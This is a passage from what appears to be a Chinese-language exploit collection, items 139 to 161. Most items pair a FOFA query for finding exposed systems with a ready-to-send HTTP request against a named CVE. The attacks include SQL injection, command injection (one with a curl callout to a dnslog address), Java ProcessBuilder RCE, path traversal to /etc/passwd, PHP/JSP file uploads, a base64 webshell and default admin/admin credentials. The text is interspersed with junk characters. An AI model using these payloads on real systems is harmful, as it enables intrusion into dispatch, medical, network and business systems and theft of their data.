4 p. q; a1 u* ?9 {: `( K& y' I& B3 ~Upgrade-Insecure-Requests: 1
6 U! U" I( |+ {- }( v; \1 ^4 E, X
K& m2 Z0 c/ l |5 r3 B, o* Q4 a! y% ~& W
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
z" {; b! l [; g, }- k" VCVE-2024-2622. F: x, B, \7 L0 L( h( v1 f5 U
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"+ u3 G. N1 v, B5 P
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
, S( C, `& L E6 ~: y: M& WHost: x.x.x.x
8 k" Q' k% j" n6 @+ C) c+ m2 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 B* p8 K" g. w @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; q, |) b0 i5 ~6 A1 R( X! C: \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) S2 b2 X& E) S; f
Accept-Encoding: gzip, deflate, br* e0 O; r4 @' O: Q1 f
Connection: close8 s. }) b7 a& ^2 F
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
; o2 p1 `% L1 A8 n/ Y7 y `& c6 zUpgrade-Insecure-Requests: 1
" R% \3 n% E$ M' \% ?7 @ ~2 q% Z' S( U2 B
6 v$ e0 h# L- A7 e) b0 s
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入" m: v8 g8 S5 ]+ Y2 b
CVE-2024-2566
' x4 O; T& [7 w0 X, Q5 C- vFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
. X: A$ C! \" Z6 o) PGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1! R1 }% M& I+ H, X. Q- v5 w
Host: x.x.x.x1 j; r, H7 E" S0 k/ z, F/ ^4 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 J( c \7 A5 t0 p3 l1 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 }/ f' q x' p4 H( L @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- h) X$ d4 S M* Q N% B' Z& EAccept-Encoding: gzip, deflate, br, C" P- g& [& e6 m: m+ M* j
Connection: close
* y7 }: R1 ~8 I5 a! eCookie: authcode=h8g9
$ A/ O( D; J3 v- E+ U8 tUpgrade-Insecure-Requests: 1. Q" i; M( H. ~+ i) s$ B/ ]1 r
) J, Y8 i" }% P; | u5 q
3 g% r9 V: [ H' R" Q% |, b3 {141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
7 n$ ~$ B# E3 v# @9 }FOFA:body="指挥调度管理平台"
& }; [+ L4 w; U# P9 k# yPOST /app/ext/ajax_users.php HTTP/1.1& ] R3 U3 t; d
Host: your-ip
) R- b" ?( d' `% D* |) y: aUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
: A" f9 B% e: i$ [ x, SContent-Type: application/x-www-form-urlencoded
& f- ^, S, P% |# s. p: `) M
: @% U* w! A/ E0 ^0 o7 A' y0 H" B; R
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -0 v* ]+ b# n' X- i( f, n
7 v5 v& ]' t! Q
3 U1 q4 o6 v: @! b
142. CMSV6车辆监控平台系统中存在弱密码
4 D9 `5 T. t& o6 ?3 Z; yCVE-2024-29666! V9 @( n o! \/ B) X$ e3 N& n
FOFA:body="/808gps/"1 C3 D: V/ ~ q- t% U3 O& E5 x
admin/admin) Z( N7 K# n* ^' F3 J/ b
143. Netis WF2780 v2.1.40144 远程命令执行
) l" s# F/ j/ x8 MCVE-2024-25850/ [0 Z0 X' y" Q% ^/ D6 b
FOFA:title='AP setup' && header='netis'- k/ X& E$ Y& z) M
PAYLOAD
2 I4 m' P, ^4 Q% b* W! ~% h0 s# w' l+ i) |; @5 @6 s
144. D-Link nas_sharing.cgi 命令注入1 I; a6 E- z3 l2 ?5 G6 P+ F
FOFA:app="D_Link-DNS-ShareCenter"; a1 \2 V/ \- `, v y2 X/ |0 [& p$ _
system参数用于传要执行的命令0 C" \5 g8 p0 N
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
/ s7 W% I( u' H/ LHost: x.x.x.x- m: W) h& ?- C
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0& x3 {" P' X$ h
Connection: close- g: z8 y& I/ X& S
Accept: */*
' j* [& K1 J6 j, Z3 }Accept-Language: en& f+ e3 n k, |# a1 c
Accept-Encoding: gzip9 L% M" Y: @; F+ w7 E C0 S
3 N6 ]7 Z: c3 K% x& p9 x
' r$ V+ G, _3 u8 L2 g* ?5 h% P145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
2 q: h2 O _' |0 q, c) Y1 yCVE-2024-3400
0 e D: S, v8 ]. i) ^# gFOFA:icon_hash="-631559155"
% T0 ~! ^3 H, O' o. |% pGET /global-protect/login.esp HTTP/1.1% {8 v) Y* ~9 C# l, n
Host: 192.168.30.112:10053 P+ |3 P9 B& f3 o _' I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
" p" Z) \& r- y; V) w/ N7 yConnection: close
; B# E( ]3 ]9 ]4 |$ K1 }Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;, q, G2 z/ Y) t# `( ]
Accept-Encoding: gzip
* T1 ]4 i; {4 d2 }9 C& d3 p& f: ?' O7 Y3 Y& s7 Y, _
# O' p+ Y1 z3 Z6 v) h# x/ Z" n- g. C146. MajorDoMo thumb.php 未授权远程代码执行
6 w2 G+ I+ _6 |5 X7 LCNVD-2024-02175
V1 D! i. B8 U6 @3 yFOFA:app="MajordomoSL"
1 k* Z# m0 r' C- Z# E! J. ?; PGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.19 j6 Y: W1 K, ?' j [& R% Q
Host: x.x.x.x( g- I) T( ~% D0 {6 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84( C; @9 b; M" n2 p
Accept-Charset: utf-8! j- @2 O3 P4 x
Accept-Encoding: gzip, deflate
1 H$ }4 C' P" w7 z! N( lConnection: close1 G/ U4 K% d/ {' P- K% }$ R
& M1 p2 c( @/ f3 D( ^
4 S$ [7 \3 \: m( [) u: a8 s147. RaidenMAILD邮件服务器v.4.9.4-路径遍历1 W6 F/ t: ]5 z" D, L
CVE-2024-32399, K5 X7 ]% a7 L! q. v+ Z
FOFA:body="RaidenMAILD"
( }4 [( v1 x) `' h/ i1 X6 D2 WGET /webeditor/../../../windows/win.ini HTTP/1.1
( A6 H: @6 P! M% _Host: 127.0.0.1:81
# W( p! P$ K9 m$ d7 t+ g+ Y6 UCache-Control: max-age=0; R: I& }* P6 K6 g0 |3 C+ f
Connection: close% ^* |: @( m7 G9 f
6 D9 A, @5 K3 R& y
. x( e5 k) q3 f' c2 `148. CrushFTP 认证绕过模板注入
3 X: Y4 e4 z& _. u" V d) eCVE-2024-4040
* I; H" M0 M HFOFA:body="CrushFTP"% O; W0 Y% ^; b$ D
PAYLOAD! h$ }$ d9 K( M6 G9 |" ~0 F- f
9 b' x0 Q. C; P4 {; ?$ W' S$ {
149. AJ-Report开源数据大屏存在远程命令执行
1 q% d u* |' Z1 o4 }. r2 jFOFA:title="AJ-Report"
9 t) y6 h. x7 Y; p2 g- \) o% [5 I1 L$ @5 E4 W
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
, \' g M2 p7 w7 R6 w R) W4 `Host: x.x.x.x6 j0 Z8 Y) W7 B, N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 _7 @( ~, Z/ k! k8 \( ]" y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, T9 k N) d* h5 m) u6 qAccept-Encoding: gzip, deflate, br+ e0 f: v: p' T1 r, u& z
Accept-Language: zh-CN,zh;q=0.9& P5 D+ z) S4 b y$ b, Q' T# l
Content-Type: application/json;charset=UTF-8
& A# {. }5 C8 B( P; N8 zConnection: close
9 J% M& s6 T R; w: b+ R$ e9 L) H9 y8 w5 t
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
% t2 ^: B2 b+ h2 n, X' N, `& P* x, @6 Q. Y
150. AJ-Report 1.4.0 认证绕过与远程代码执行
% X9 O1 f7 t9 c7 p- l% |& B5 S1 [FOFA:title="AJ-Report"% s1 O/ h0 e2 _
POST /dataSetParam/verification;swagger-ui/ HTTP/1.16 O, q8 J' U$ A6 V4 z* |
Host: x.x.x.x, l; u' C/ Z! r& p4 A. f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 E& I- v, H2 c0 J( R+ _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! f6 k6 ~9 T, W" I* L: E" |
Accept-Encoding: gzip, deflate, br$ M# v, i7 I( p
Accept-Language: zh-CN,zh;q=0.9$ ~, g# M0 `1 f7 w- I
Content-Type: application/json;charset=UTF-8+ A. s0 G5 W/ @! _! `1 a& n
Connection: close, ]2 {) g/ v( A8 ~5 ~! \
Content-Length: 339 C" w3 O1 A4 [- L- l) d' U h
1 p! L- U% n; t{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}, E! G' A7 n3 X- p( j! \
8 q1 H: y- y. K2 M4 H- l) |' N
7 @: F" x6 Z4 ]9 H8 y4 k1 f( A5 f
151. AJ-Report 1.4.1 pageList sql注入
1 }5 o+ @9 i" g8 b, mFOFA:title="AJ-Report"+ r" |1 o2 O. y" `
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
& ?, R/ m! [ W. ~$ A qHost: x.x.x.x5 k2 P: j# ]! i) o0 X, W l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# q' {: q: W, g ?3 ?
Connection: close
& k9 H; P/ q# K# V8 AAccept-Encoding: gzip
; G0 B+ u/ C# H3 O/ X0 c- v7 w* K) v3 D4 }
! U% d/ k6 J7 ]" b j% r
152. Progress Kemp LoadMaster 远程命令执行! e( ~2 Y7 g3 ^
CVE-2024-1212
$ l& d. W7 O7 Q7 V6 ?LoadMaster <= 7.2.59.2 (GA)2 B: [. |# J8 |1 L/ B, @
LoadMaster<=7.2.54.8 (LTSF)" ]: ]8 Q( y( I2 Q g9 p
LoadMaster <= 7.2.48.10 (LTS)/ [2 K0 R$ G7 m5 I6 L( O/ B8 t
FOFA:body="LoadMaster"" w. Q/ Q- e4 ?9 ~+ I* R
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码+ ^* B$ F4 M4 @0 P( }) F6 _ K9 q* s
GET /access/set?param=enableapi&value=1 HTTP/1.17 I' T G$ i% y- K. `) a
Host: x.x.x.x
' a& ?. p; n- B9 `, q( K0 wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
$ @7 y4 e5 X5 u( m2 RConnection: close$ q( S' w' j% r# s9 f
Accept: */*6 Q9 v$ d# F K C% q1 U; n" r
Accept-Language: en
3 E: n% y" I" o. yAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=5 ]9 j; V; r9 g
Accept-Encoding: gzip5 P5 n4 V" f6 }2 b
; h g" k8 u' ]
$ R0 X# Y2 x5 z
153. gradio任意文件读取! W& X4 Q; A5 W( k6 D; D4 T
CVE-2024-1561FOFA:body="__gradio_mode__"1 t* [) m0 F1 ~+ i' b# B+ Q$ v* B
第一步,请求/config文件获取componets的id: [+ l9 F+ h$ Q8 {( A
http://x.x.x.x/config1 c7 p* T! \, E! t+ @- W
8 M: A8 r) E9 H# O
2 X6 F' ~ l9 H- {8 O第二步,将/etc/passwd的内容写入到一个临时文件6 l& V/ d% @& e6 F% b: `
POST /component_server HTTP/1.1
3 {0 L3 U5 ?: g3 B; p* SHost: x.x.x.x) p( ^, t7 q4 v- u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
( {4 x7 Q# o, O" }0 }! {Connection: close0 o" r, e# d6 @+ e5 y
Content-Length: 115
9 }8 Y9 K, e% R$ p6 O- H+ OContent-Type: application/json$ ]: @( v* W* Z3 a- Z
Accept-Encoding: gzip
$ }# u, d7 S8 _
5 I# J3 q: Q0 j8 G/ [9 Z S4 Y9 |{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
% V% d7 J, ]* e" E% N* Q+ D( G% k4 [' } I: a
% N& R0 y4 u1 S2 b0 J1 y o第三步访问9 y" j# d6 G, Z% [2 S3 {
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
$ F7 t0 D3 P6 J8 ?) m/ W' q" Z# G$ d
8 g/ B) E- S2 T, K% o3 I3 f, v" t3 g; }% T, s: p3 {1 `! K
154. 天维尔消防救援作战调度平台 SQL注入
3 H0 s* P8 q( [ qCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"* P: a% \6 f/ D! n% m0 ~8 m& r
POST /twms-service-mfs/mfsNotice/page HTTP/1.1$ [. u) y3 } s7 I( {
Host: x.x.x.x
0 Y3 x, u' u6 C! y. B0 KContent-Length: 106; v9 v8 f+ w& \0 n6 r
Cache-Control: max-age=0
/ S' j$ C! {4 ~" J: q8 Y4 {6 OUpgrade-Insecure-Requests: 1
0 G, Y) x. k |6 P: t: BOrigin: http://x.x.x.x2 |- R3 K9 l! _+ q
Content-Type: application/json( h9 n) d/ R; x# o4 E) `' F( D& G5 G' z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" a5 g, _+ s& D4 i$ B* d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- z, n0 P D9 wReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
! i+ v2 i% ?" `. GAccept-Encoding: gzip, deflate
5 o3 \! a% j5 ]* f0 m7 g* C# fAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
7 j- P& F2 {" d. q2 jConnection: close4 a; |! n- p: W6 h
" s! Y) O* s8 l, m
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}5 V8 p9 l4 j/ F& u
) f, [/ @5 B) A* {3 ]+ d
- C7 b6 H9 j$ T J9 t+ c155. 六零导航页 file.php 任意文件上传% s6 T& Q4 W/ M; O" \2 Z# ~
CVE-2024-34982. g0 Q8 g) x5 P" b( ~$ J
FOFA:title=="上网导航 - LyLme Spage"
% h( e# |5 w- CPOST /include/file.php HTTP/1.1
, R. @; ]4 q: p. ?' l7 xHost: x.x.x.x3 O/ Q/ m u: v2 P7 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.03 v; a+ l( O. o, w: {7 C" j
Connection: close! o' N2 v9 f, h+ J4 J$ Z5 |! a# p
Content-Length: 232' A2 r: I4 Z" h+ B/ H4 ]- m; |
Accept: application/json, text/javascript, */*; q=0.01, C; V: T9 |9 r$ K) _: }0 ^: s
Accept-Encoding: gzip, deflate, br. O$ x- M0 q$ e; g8 F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 c: i! o6 w* L8 T' k: jContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f+ l2 q1 d$ G6 W! d4 x0 F( t6 K
X-Requested-With: XMLHttpRequest
& B3 i) L, h0 A/ s- B6 b$ C- \; b( t& @ g+ w: \$ K5 h
-----------------------------qttl7vemrsold314zg0f: E6 I B/ J" x. a3 k2 G6 E% z
Content-Disposition: form-data; name="file"; filename="test.php"
( \; n( X; R8 ?! ] d; GContent-Type: image/png
& N- }9 P& m1 l1 b+ D m" _6 A$ I# f0 ?5 d8 v$ Q6 s. ~! Z
<?php phpinfo();unlink(__FILE__);?>
5 o l& B7 E& ?/ w# Y9 J" w( S-----------------------------qttl7vemrsold314zg0f--
4 X5 F: @! N& Z) [9 X; h+ R
- M% E1 w9 L: r4 \# U* P2 B. p' e9 f9 s4 M# Z5 _# Q) @0 h2 o
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php3 U0 e1 O0 m* S, h4 H2 N. D9 Y
0 ]( P* W5 _8 m0 y- O# h. X
156. TBK DVR-4104/DVR-4216 操作系统命令注入
6 @% N& F1 W0 A7 u" l! z' P1 K" n' tCVE-2024-3721
% n8 s: j7 e& Z, d4 k: }/ r9 uFOFA:"Location: /login.rsp"
4 H- A5 }4 p( Z9 q( O: Q·TBK DVR-4104
3 q4 u8 g: P2 d( k" x! i y·TBK DVR-4216
1 h8 k" C. V- k4 ?curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"7 J: I* A' @5 B" U1 H: g
7 \- d: b- x) @4 t) }
: P6 z# h/ C3 O* H
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
! [% b' r, m+ Q- IHost: x.x.x.x
4 n* A: z1 t5 x K' c* v( l8 LUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. y6 I+ A/ P( \; i2 e: |! c. I sConnection: close. d+ D+ K) a% O7 M
Content-Length: 0) ]7 k( Z1 T$ o& D+ |& ?8 t* k
Cookie: uid=1# _4 X$ H2 G" E5 x
Accept-Encoding: gzip
' J7 _9 p# G6 @$ @
% H7 T# V" i0 t$ ?8 o5 p. h" d
3 G, k* |5 r, {157. 美特CRM upload.jsp 任意文件上传& ]$ s' X8 u6 C* R, n. e8 C' N+ w# ^" k
CNVD-2023-069716 ^) ~" w$ ?; n E5 w& M
FOFA:body="/common/scripts/basic.js"9 s7 W& r1 J5 h4 A
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.16 L, t7 H) b/ K) w
Host: x.x.x.x; ~+ p8 p3 H; B% b8 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
. N: K! Q$ s% g' c# Q3 vContent-Length: 709
+ B; A/ b' a c0 c( F7 P$ YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; Z9 E. ~) G/ ?3 c$ @- z6 C
Accept-Encoding: gzip, deflate
; Z3 o- M) l# ~* M- d; I f1 lAccept-Language: zh-CN,zh;q=0.97 Z$ h) h3 j: r0 L" U( _/ s: q) Q: H1 j
Cache-Control: max-age=0
& E+ H, s# o! `7 b2 WConnection: close! }! U" Q9 ~3 o% U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN! `' H7 L; `; I3 E6 v
Upgrade-Insecure-Requests: 1
" y8 d; ^+ ]9 }6 v% d# P6 m1 m0 }) c' B% Z' p& l+ Y, ^
------WebKitFormBoundary1imovELzPsfzp5dN1 e' h; U" G l* E, D& E& i
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
. u) o I- y1 U; ]& F9 yContent-Type: application/octet-stream! r- @2 E0 c4 ]# |, B: l
/ V' u d7 P) w3 P. o6 t
nyhelxrutzwhrsvsrafb8 ]( [# F L6 O( S
------WebKitFormBoundary1imovELzPsfzp5dN
T4 P: {: j; e7 F7 m# GContent-Disposition: form-data; name="key"
4 }5 b7 \& H- P8 x( U" M) P7 C0 S" Q4 H7 z) r
null5 f' I1 N: n' ~: r" s
------WebKitFormBoundary1imovELzPsfzp5dN. g% F8 I; J9 u! O) z( B
Content-Disposition: form-data; name="form". y, P, ~3 v) ]! a, Q
( q" V' J8 W b- q
null
" [- q8 I. g, b. @ Q------WebKitFormBoundary1imovELzPsfzp5dN
" N0 Y- b* `# \* S# @4 Z/ W! O$ l% {Content-Disposition: form-data; name="field"' f4 J+ |' O5 F( z. G
7 [6 {& \/ h1 y, d6 I* S/ Znull' }7 J, o+ q7 W6 H
------WebKitFormBoundary1imovELzPsfzp5dN
# W) H1 T1 p/ w* a2 f! L, wContent-Disposition: form-data; name="filetitile"
9 D6 ]. H2 U' f3 [# ?, X7 M) z
' q: X1 u9 N( z) C1 ~2 i* ?( wnull8 @* k/ w( c0 K W+ h* T
------WebKitFormBoundary1imovELzPsfzp5dN% w4 H) U, G9 a; X: E
Content-Disposition: form-data; name="filefolder"+ Z, [" t* A" {& j4 y! ?
/ ]% t7 l% g& t3 ? g D1 Z8 @2 ?
null
& c8 q9 {5 g1 ~: k; i------WebKitFormBoundary1imovELzPsfzp5dN--2 _7 b6 |6 S+ Q' B- u1 h
4 F+ m; O3 F3 y4 I; q7 `
' ?$ Q5 O. b: L, M( o; w5 H: x
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp$ A( U! s- s. {4 p+ U
7 @: `" u" q0 K7 y% Y# r d158. Mura-CMS-processAsyncObject存在SQL注入0 k! m; m' S- {. X
CVE-2024-326403 n$ P! J, C: M) c, l. m: {# J
FOFA:"Generator: Masa CMS"
1 E& ?1 @% V& g/ PPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
. m+ B* l2 C' v% Y9 `Host: {{Hostname}}/ ~8 W3 N$ q8 e% N+ |/ [& V2 M
Content-Type: application/x-www-form-urlencoded
0 w% Y& f4 A/ x% n ~5 K7 [( @
( @' ]: b) n: f) _& D/ I8 d& E! ^4 vobject=displayregion&contenthistid=x\'&previewid=1! R, n# r& C7 f1 b# L
/ A6 l* Z& J f- @! B
" \9 m: J# ^3 O# z159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传+ h) e) q6 G) F+ p# B; z2 r6 K
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")) }. G: y, l4 U
POST /webservices/WebJobUpload.asmx HTTP/1.1 |2 {7 e$ a% L# P, Q7 z
Host: x.x.x.x
$ y: K$ d' g9 p# y; x5 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
) s) ^0 v( r/ I( S N$ oContent-Length: 10800 z) t# F( S1 B
Accept-Encoding: gzip, deflate
+ w' y/ [2 _( }# E: }) ]3 HConnection: close
$ C% x' C9 x! Y$ ]$ v! |: t! zContent-Type: text/xml; charset=utf-8
" w1 `% n4 q6 D0 wSoapaction: "http://rainier/jobUpload"
9 j# x. F, X% ` U/ s) G) `3 w! c; B# W2 e) K
<?xml version="1.0" encoding="utf-8"?>
0 |5 o5 z( i* U: e3 _3 f<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
/ U9 B) z0 l- N( s+ f4 }4 Y<soap:Body>
. O5 d7 @0 `/ u- P. L- t4 u" {<jobUpload xmlns="http://rainier">& h" x0 V! l j
<vcode>1</vcode>, ~2 v' h; `4 m
<subFolder></subFolder>3 ~8 b* l- N0 m
<fileName>abcrce.asmx</fileName>
2 x1 I: U: R4 d# }( H, |<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
" Q7 B) n/ q7 O+ }* D# J( {( a</jobUpload>$ p2 c9 \% h. W l3 D2 F3 l* a
</soap:Body>
$ ~ i: Y7 _7 o) y! u. w3 T; {9 S. o</soap:Envelope>1 ~; F# |2 i* s V
! C3 {, w" O& D; U/ x
& J/ J! s6 W! Z% B) [/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World") Y0 R9 A* ?, j, V/ a+ R$ _4 H6 j f7 _
2 k: e) D$ g+ P6 c% o
8 D5 I) {1 r* u5 u u! x) }160. Sonatype Nexus Repository 3目录遍历与文件读取
0 [. s* _+ M0 I( u3 N! N6 ^- y( jCVE-2024-4956 s$ @9 Z$ h' E
FOFA:title="Nexus Repository Manager"
) h0 J0 ?% {3 ~, xGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
/ M9 q8 T' W( y% l; b7 Y' h1 \+ @Host: x.x.x.x6 _$ X$ n2 m: v% T p) {; R' U
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
/ c7 P0 O' h8 L9 J. ^2 lConnection: close
" L0 [& t8 o- Y& mAccept: */*- u6 s% o4 ?' ~+ w5 x8 D. X
Accept-Language: en
" ^0 I/ J. c4 n; J: mAccept-Encoding: gzip
' Q$ i" r5 y1 H8 w8 G* B3 D8 d, l/ i: y0 w3 C
3 |- j- e* {6 f% ?8 g
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传$ M' g8 k2 [3 X8 \5 X+ ?
FOFA:body="/KT_Css/qd_defaul.css"
8 d* g2 K0 e! B3 N; M& G8 ]第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密9 k1 @6 \, n; g9 `$ {
POST /Webservice.asmx HTTP/1.1& p9 J# `, L! m$ c0 U
Host: x.x.x.x6 A" O# m A% b2 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
! _2 L# |4 ^& p. fConnection: close8 S6 j3 i: w8 @) w
Content-Length: 4456 U- a0 x& _4 S3 A7 k4 b
Content-Type: text/xml
